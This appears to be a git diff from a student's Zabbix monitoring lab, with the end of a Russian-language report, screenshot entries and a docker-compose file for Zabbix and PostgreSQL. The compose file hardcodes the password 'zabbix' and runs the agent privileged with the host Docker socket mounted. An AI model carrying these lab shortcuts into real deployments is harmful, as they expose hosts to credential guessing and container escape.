||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
4. Виджет с информацией о системе в целом.
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
5. Настроим виджеты с информацией об аптайме ОС, утилизации процессора и памяти.
|
||||||
|
|
||||||
|
6. В итоге мы получили следующий дашборд.
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
7. Теперь можно добавить пару графиков, например график доступности Mikrotik (основан на метрике доступности по ICMP) и утилизацию сервера Zabbix (по CPU)
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
## Выводы
|
||||||
|
|
||||||
|
Лабортаорная работа завершена. В ходе работы мы научились разворачивать Zabbix и добавлять устройства в мониторинг. Устройства, на которые нельзя установить Zabbix-агент по прежнему могут быть поставлены на мониторинг, например с помощью SNMP. Zabbix очень функциональный open-source инструмент мониторинга, который очень в том числе в Enterprise среде за свою стабильность, большие возможности и широкую поддержку коммьюнити.
|
||||||
|
|
||||||
|
|
||||||
|
**Выполнил:** Харитонов Марат Русланович, студенческий билет М235314.
|
||||||
BIN
01-main/02-monitoring/03-monitoring/img/01.png
Normal file
|
After Width: | Height: | Size: 70 KiB |
BIN
01-main/02-monitoring/03-monitoring/img/02.png
Normal file
|
After Width: | Height: | Size: 50 KiB |
BIN
01-main/02-monitoring/03-monitoring/img/03.png
Normal file
|
After Width: | Height: | Size: 890 KiB |
BIN
01-main/02-monitoring/03-monitoring/img/04.png
Normal file
|
After Width: | Height: | Size: 210 KiB |
BIN
01-main/02-monitoring/03-monitoring/img/05.png
Normal file
|
After Width: | Height: | Size: 64 KiB |
BIN
01-main/02-monitoring/03-monitoring/img/06.png
Normal file
|
After Width: | Height: | Size: 184 KiB |
BIN
01-main/02-monitoring/03-monitoring/img/07.png
Normal file
|
After Width: | Height: | Size: 206 KiB |
BIN
01-main/02-monitoring/03-monitoring/img/08.png
Normal file
|
After Width: | Height: | Size: 221 KiB |
BIN
01-main/02-monitoring/03-monitoring/img/09.png
Normal file
|
After Width: | Height: | Size: 155 KiB |
BIN
01-main/02-monitoring/03-monitoring/img/10.png
Normal file
|
After Width: | Height: | Size: 179 KiB |
BIN
01-main/02-monitoring/03-monitoring/img/11.png
Normal file
|
After Width: | Height: | Size: 173 KiB |
BIN
01-main/02-monitoring/03-monitoring/img/12.png
Normal file
|
After Width: | Height: | Size: 212 KiB |
BIN
01-main/02-monitoring/03-monitoring/img/13.png
Normal file
|
After Width: | Height: | Size: 173 KiB |
BIN
01-main/02-monitoring/03-monitoring/img/14.png
Normal file
|
After Width: | Height: | Size: 195 KiB |
BIN
01-main/02-monitoring/03-monitoring/img/15.png
Normal file
|
After Width: | Height: | Size: 306 KiB |
@@ -0,0 +1,81 @@
|
|||||||
|
version: '3.5'
|
||||||
|
services:
|
||||||
|
server:
|
||||||
|
image: zabbix/zabbix-server-pgsql:alpine-latest
|
||||||
|
ports:
|
||||||
|
- "10051:10051"
|
||||||
|
volumes:
|
||||||
|
- /etc/localtime:/etc/localtime
|
||||||
|
- /etc/timezone:/etc/timezone
|
||||||
|
restart: always
|
||||||
|
depends_on:
|
||||||
|
- postgres-server
|
||||||
|
environment:
|
||||||
|
- POSTGRES_USER=zabbix
|
||||||
|
- POSTGRES_PASSWORD=zabbix
|
||||||
|
- POSTGRES_DB=zabbixNew
|
||||||
|
- ZBX_HISTORYSTORAGETYPES=log,text #Zabbix configuration variables
|
||||||
|
- ZBX_DEBUGLEVEL=1
|
||||||
|
- ZBX_HOUSEKEEPINGFREQUENCY=1
|
||||||
|
- ZBX_MAXHOUSEKEEPERDELETE=5000
|
||||||
|
- ZBX_PROXYCONFIGFREQUENCY=3600
|
||||||
|
web-nginx-pgsql:
|
||||||
|
image: zabbix/zabbix-web-nginx-pgsql:alpine-latest
|
||||||
|
ports:
|
||||||
|
- "80:8080"
|
||||||
|
- "443:8443"
|
||||||
|
volumes:
|
||||||
|
- /etc/localtime:/etc/localtime
|
||||||
|
- /etc/timezone:/etc/timezone
|
||||||
|
- /etc/ssl/nginx:/etc/ssl/nginx
|
||||||
|
healthcheck:
|
||||||
|
test: ["CMD", "curl", "-f", "http://localhost:8080/"]
|
||||||
|
interval: 10s
|
||||||
|
timeout: 5s
|
||||||
|
retries: 3
|
||||||
|
start_period: 30s
|
||||||
|
sysctls:
|
||||||
|
- net.core.somaxconn=65535
|
||||||
|
restart: always
|
||||||
|
depends_on:
|
||||||
|
- server
|
||||||
|
- postgres-server
|
||||||
|
environment:
|
||||||
|
- POSTGRES_USER=zabbix
|
||||||
|
- POSTGRES_PASSWORD=zabbix
|
||||||
|
- POSTGRES_DB=zabbixNew
|
||||||
|
- ZBX_SERVER_HOST=server
|
||||||
|
- ZBX_POSTMAXSIZE=64M
|
||||||
|
- PHP_TZ=Europe/Moscow
|
||||||
|
- ZBX_MAXEXECUTIONTIME=500
|
||||||
|
agent:
|
||||||
|
image: zabbix/zabbix-agent:alpine-latest
|
||||||
|
ports:
|
||||||
|
- "10050:10050"
|
||||||
|
volumes:
|
||||||
|
- /etc/localtime:/etc/localtime
|
||||||
|
- /etc/timezone:/etc/timezone
|
||||||
|
- /proc:/proc
|
||||||
|
- /sys:/sys
|
||||||
|
- /dev:/dev
|
||||||
|
- /var/run/docker.sock:/var/run/docker.sock
|
||||||
|
privileged: true
|
||||||
|
pid: "host"
|
||||||
|
restart: always
|
||||||
|
depends_on:
|
||||||
|
- server
|
||||||
|
environment:
|
||||||
|
- ZBX_SERVER_HOST=server
|
||||||
|
|
||||||
|
postgres-server:
|
||||||
|
image: postgres:16.2
|
||||||
|
restart: always
|
||||||
|
volumes:
|
||||||
|
- pg_data:/var/lib/postgresql/data
|
||||||
|
environment:
|
||||||
|
- POSTGRES_PASSWORD=zabbix
|
||||||
|
- POSTGRES_USER=zabbix
|
||||||
|
- POSTGRES_DB=zabbixNew
|
||||||
|
|
||||||
|
volumes:
|
||||||
|
pg_data:
|
||||||
|
Before Width: | Height: | Size: 48 KiB After Width: | Height: | Size: 48 KiB |
|
Before Width: | Height: | Size: 9.2 KiB After Width: | Height: | Size: 9.2 KiB |
|
Before Width: | Height: | Size: 142 KiB After Width: | Height: | Size: 142 KiB |
|
Before Width: | Height: | Size: 19 KiB After Width: | Height: | Size: 19 KiB |
|
Before Width: | Height: | Size: 97 KiB After Width: | Height: | Size: 97 KiB |
|
Before Width: | Height: | Size: 61 KiB After Width: | Height: | Size: 61 KiB |
|
Before Width: | Height: | Size: 104 KiB After Width: | Height: | Size: 104 KiB |
|
Before Width: | Height: | Size: 173 KiB After Width: | Height: | Size: 173 KiB |
|
Before Width: | Height: | Size: 19 KiB After Width: | Height: | Size: 19 KiB |
|
Before Width: | Height: | Size: 95 KiB After Width: | Height: | Size: 95 KiB |
|
Before Width: | Height: | Size: 263 KiB After Width: | Height: | Size: 263 KiB |
|
Before Width: | Height: | Size: 49 KiB After Width: | Height: | Size: 49 KiB |
|
Before Width: | Height: | Size: 99 KiB After Width: | Height: | Size: 99 KiB |
|
Before Width: | Height: | Size: 26 KiB After Width: | Height: | Size: 26 KiB |
|
Before Width: | Height: | Size: 105 KiB After Width: | Height: | Size: 105 KiB |
|
Before Width: | Height: | Size: 190 KiB After Width: | Height: | Size: 190 KiB |
|
Before Width: | Height: | Size: 57 KiB After Width: | Height: | Size: 57 KiB |
|
Before Width: | Height: | Size: 108 KiB After Width: | Height: | Size: 108 KiB |
|
Before Width: | Height: | Size: 108 KiB After Width: | Height: | Size: 108 KiB |
|
Before Width: | Height: | Size: 54 KiB After Width: | Height: | Size: 54 KiB |
|
Before Width: | Height: | Size: 80 KiB After Width: | Height: | Size: 80 KiB |
|
Before Width: | Height: | Size: 138 KiB After Width: | Height: | Size: 138 KiB |
|
Before Width: | Height: | Size: 139 KiB After Width: | Height: | Size: 139 KiB |
|
Before Width: | Height: | Size: 43 KiB After Width: | Height: | Size: 43 KiB |
|
Before Width: | Height: | Size: 72 KiB After Width: | Height: | Size: 72 KiB |
|
Before Width: | Height: | Size: 23 KiB After Width: | Height: | Size: 23 KiB |
|
Before Width: | Height: | Size: 38 KiB After Width: | Height: | Size: 38 KiB |
|
Before Width: | Height: | Size: 26 KiB After Width: | Height: | Size: 26 KiB |
|
Before Width: | Height: | Size: 246 KiB After Width: | Height: | Size: 246 KiB |
|
Before Width: | Height: | Size: 269 KiB After Width: | Height: | Size: 269 KiB |
|
Before Width: | Height: | Size: 38 KiB After Width: | Height: | Size: 38 KiB |
|
Before Width: | Height: | Size: 37 KiB After Width: | Height: | Size: 37 KiB |
|
Before Width: | Height: | Size: 191 KiB After Width: | Height: | Size: 191 KiB |
|
Before Width: | Height: | Size: 224 KiB After Width: | Height: | Size: 224 KiB |
|
Before Width: | Height: | Size: 36 KiB After Width: | Height: | Size: 36 KiB |
|
Before Width: | Height: | Size: 40 KiB After Width: | Height: | Size: 40 KiB |
|
Before Width: | Height: | Size: 47 KiB After Width: | Height: | Size: 47 KiB |
|
Before Width: | Height: | Size: 48 KiB After Width: | Height: | Size: 48 KiB |
|
Before Width: | Height: | Size: 145 KiB After Width: | Height: | Size: 145 KiB |
|
Before Width: | Height: | Size: 40 KiB After Width: | Height: | Size: 40 KiB |
|
Before Width: | Height: | Size: 49 KiB After Width: | Height: | Size: 49 KiB |
|
Before Width: | Height: | Size: 46 KiB After Width: | Height: | Size: 46 KiB |
|
Before Width: | Height: | Size: 121 KiB After Width: | Height: | Size: 121 KiB |
|
Before Width: | Height: | Size: 62 KiB After Width: | Height: | Size: 62 KiB |
|
Before Width: | Height: | Size: 54 KiB After Width: | Height: | Size: 54 KiB |
|
Before Width: | Height: | Size: 54 KiB After Width: | Height: | Size: 54 KiB |
|
Before Width: | Height: | Size: 54 KiB After Width: | Height: | Size: 54 KiB |
|
Before Width: | Height: | Size: 55 KiB After Width: | Height: | Size: 55 KiB |
|
Before Width: | Height: | Size: 55 KiB After Width: | Height: | Size: 55 KiB |
|
Before Width: | Height: | Size: 97 KiB After Width: | Height: | Size: 97 KiB |
|
Before Width: | Height: | Size: 97 KiB After Width: | Height: | Size: 97 KiB |
|
Before Width: | Height: | Size: 55 KiB After Width: | Height: | Size: 55 KiB |
|
Before Width: | Height: | Size: 59 KiB After Width: | Height: | Size: 59 KiB |
|
Before Width: | Height: | Size: 122 KiB After Width: | Height: | Size: 122 KiB |
|
Before Width: | Height: | Size: 110 KiB After Width: | Height: | Size: 110 KiB |
|
Before Width: | Height: | Size: 24 KiB After Width: | Height: | Size: 24 KiB |
|
Before Width: | Height: | Size: 124 KiB After Width: | Height: | Size: 124 KiB |
|
Before Width: | Height: | Size: 60 KiB After Width: | Height: | Size: 60 KiB |
|
Before Width: | Height: | Size: 121 KiB After Width: | Height: | Size: 121 KiB |
|
Before Width: | Height: | Size: 189 KiB After Width: | Height: | Size: 189 KiB |
|
Before Width: | Height: | Size: 178 KiB After Width: | Height: | Size: 178 KiB |
|
Before Width: | Height: | Size: 90 KiB After Width: | Height: | Size: 90 KiB |
|
Before Width: | Height: | Size: 159 KiB After Width: | Height: | Size: 159 KiB |